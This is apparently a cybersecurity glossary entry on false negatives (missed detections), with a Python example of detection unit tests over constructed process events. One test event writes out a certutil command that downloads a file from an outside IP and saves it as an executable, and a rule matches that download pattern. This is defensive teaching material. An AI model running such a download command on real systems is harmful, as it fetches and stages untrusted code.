False Negative
What is False Negative?
Malicious activity that a detection failed to flag, leaving the threat unnoticed and allowing the attacker to continue without alerting defenders.
A false negative is the silent failure of a detection: a real attack happens, but no alert fires, so analysts never get the chance to respond. Causes include missing log sources, signatures the attacker evaded, detections scoped too narrowly, broken ingestion pipelines, gaps in the time window a rule inspects, and adversary tradecraft such as living-off-the-land binaries or encrypted command and control. False negatives are harder to measure than false positives because by definition they are invisible: nothing in the alert queue records them, so the only way to count them is to run known-malicious activity through the pipeline and check whether it was flagged. Teams reduce them through purple-team exercises, breach-and-attack simulation, MITRE ATT&CK coverage mapping, detection unit tests, and ongoing telemetry gap analysis.
● Examples
- 01
An adversary uses signed Windows binaries (LOLBins) to run commands that no signature catches.
- 02
A new malware family is missed because its TLS C2 traffic is not inspected by the proxy.
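The definition above lists detection unit tests and telemetry gap analysis as ways to make false negatives countable, and example 01 shows the LOLBin case that file-based signatures miss. The following is an added illustration, not code from this page or from any product: a narrow rule (anything executed from a Temp directory) and a LOLBin rule (certutil used as a downloader) are run over a handful of constructed process-creation events with known ground truth, and the events that are attacks but were flagged by no rule are reported as false negatives. The second function flags hosts that should be reporting but have sent nothing, since an attack on a silent host can only ever be a false negative. Hostnames, paths, the command lines and the 198.51.100.7 address are all constructed for the example.

```python
"""Detection unit tests that make false negatives visible.

Added example for this glossary entry; it is not code from the page or
from any product. The events, rules and "attack" command lines below are
constructed for illustration only.
"""
import re
from dataclasses import dataclass
from typing import Callable, Dict, List, Set


@dataclass(frozen=True)
class Event:
    host: str
    image: str      # full path of the process image
    cmdline: str
    parent: str     # parent process image name


# Constructed process-creation telemetry (not real logs).
# Index 1 is commodity malware dropped to %TEMP%; index 2 is a
# living-off-the-land download using a signed Windows binary (certutil).
EVENTS: List[Event] = [
    Event("ws01", r"C:\Windows\System32\cmd.exe", "cmd.exe /c dir", "explorer.exe"),
    Event("ws01", r"C:\Users\a\AppData\Local\Temp\evil.exe", "evil.exe --beacon", "cmd.exe"),
    Event("ws02", r"C:\Windows\System32\certutil.exe",
          "certutil.exe -urlcache -split -f http://198.51.100.7/x.txt x.exe", "winword.exe"),
    Event("ws03", r"C:\Windows\System32\notepad.exe", "notepad.exe notes.txt", "explorer.exe"),
]

# Ground truth for the unit test: which event indexes are real attacks.
ATTACKS: Set[int] = {1, 2}

# Hosts that are supposed to ship process telemetry to the SIEM (constructed).
EXPECTED_HOSTS: Set[str] = {"ws01", "ws02", "ws03", "ws04"}

Rule = Callable[[Event], bool]


def rule_exec_from_temp(e: Event) -> bool:
    """Narrow rule: any process image launched from a Temp directory."""
    return re.search(r"\\Temp\\", e.image, re.IGNORECASE) is not None


def rule_certutil_download(e: Event) -> bool:
    """LOLBin rule: certutil invoked as a downloader (-urlcache)."""
    return e.image.lower().endswith("certutil.exe") and "-urlcache" in e.cmdline.lower()


def evaluate(rules: List[Rule], events: List[Event], attacks: Set[int]) -> Dict[str, List[int]]:
    """Run the rules over labelled events and report TP / FP / FN indexes.

    A false negative is an attack index that no rule flagged; it can only
    be computed because the ground truth is known."""
    flagged = {i for i, e in enumerate(events) if any(r(e) for r in rules)}
    return {
        "tp": sorted(flagged & attacks),
        "fp": sorted(flagged - attacks),
        "fn": sorted(attacks - flagged),
    }


def telemetry_gaps(expected: Set[str], events: List[Event]) -> List[str]:
    """Hosts that should report but have sent nothing.

    A silent host cannot produce a true positive, so every attack on it
    is a false negative regardless of rule quality."""
    seen = {e.host for e in events}
    return sorted(expected - seen)


if __name__ == "__main__":
    # The Temp-only rule misses the certutil download (index 2).
    print(evaluate([rule_exec_from_temp], EVENTS, ATTACKS))
    # Adding the LOLBin rule closes that gap without adding false positives.
    print(evaluate([rule_exec_from_temp, rule_certutil_download], EVENTS, ATTACKS))
    # ws04 never reported: a telemetry gap, not a detection-logic problem.
    print(telemetry_gaps(EXPECTED_HOSTS, EVENTS))
```

The point of keeping ground truth next to the rules is that the false-negative count becomes a regression test: when someone tightens `rule_certutil_download` or an upstream parser drops the command line field, the test turns red instead of the miss staying invisible in production.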
● Frequently asked questions
What is False Negative?
Malicious activity that a detection failed to flag, leaving the threat unnoticed and allowing the attacker to continue without alerting defenders. It belongs to the Defense & Operations category of cybersecurity.
What does False Negative mean?
Malicious activity that a detection failed to flag, leaving the threat unnoticed and allowing the attacker to continue without alerting defenders.
How does False Negative work?
A false negative is the silent failure of a detection: a real attack happens, but no alert fires, so analysts never get the chance to respond. Causes include missing log sources, signatures the attacker evaded, detections scoped too narrowly, broken ingestion pipelines, gaps in the time window a rule inspects, and adversary tradecraft such as living-off-the-land binaries or encrypted command and control. False negatives are harder to measure than false positives because by definition they are invisible: nothing in the alert queue records them, so the only way to count them is to run known-malicious activity through the pipeline and check whether it was flagged. Teams reduce them through purple-team exercises, breach-and-attack simulation, MITRE ATT&CK coverage mapping, detection unit tests, and ongoing telemetry gap analysis.
How do you defend against False Negative?
A false negative cannot be blocked directly; the goal is to reduce how many occur and how long they persist. That means closing the gaps named in the definition above: onboard missing log sources and alert when an expected source goes silent, broaden detections that are scoped too narrowly, write rules for living-off-the-land tradecraft rather than relying only on file signatures, inspect or at least profile encrypted command-and-control traffic, and continuously verify coverage with purple-team exercises, breach-and-attack simulation, MITRE ATT&CK coverage mapping, detection unit tests, and threat hunting for what existing detections missed.
What are other names for False Negative?
Common alternative names include: FN, Missed detection.
● Related terms
- False Positive (defense-ops, № 406)
A security alert that flags benign activity as malicious, costing analyst time and eroding trust in the detection that produced it.
- Detection Engineering (defense-ops, № 307)
The discipline of designing, testing, deploying, and maintaining security detections as code, with measurable coverage of adversary techniques.
- MITRE ATT&CK (compliance, № 687)
A globally accessible knowledge base of adversary tactics and techniques observed in real-world attacks, maintained by MITRE.
- Threat Hunting (defense-ops, № 1147)
Proactive, hypothesis-driven search through telemetry to uncover threats that have evaded existing detections.
- SIEM (defense-ops, № 1039)
A platform that aggregates, normalizes and correlates security telemetry from across the enterprise to enable detection, investigation, compliance and reporting.
● See also
- Alert Fatigue (№ 041)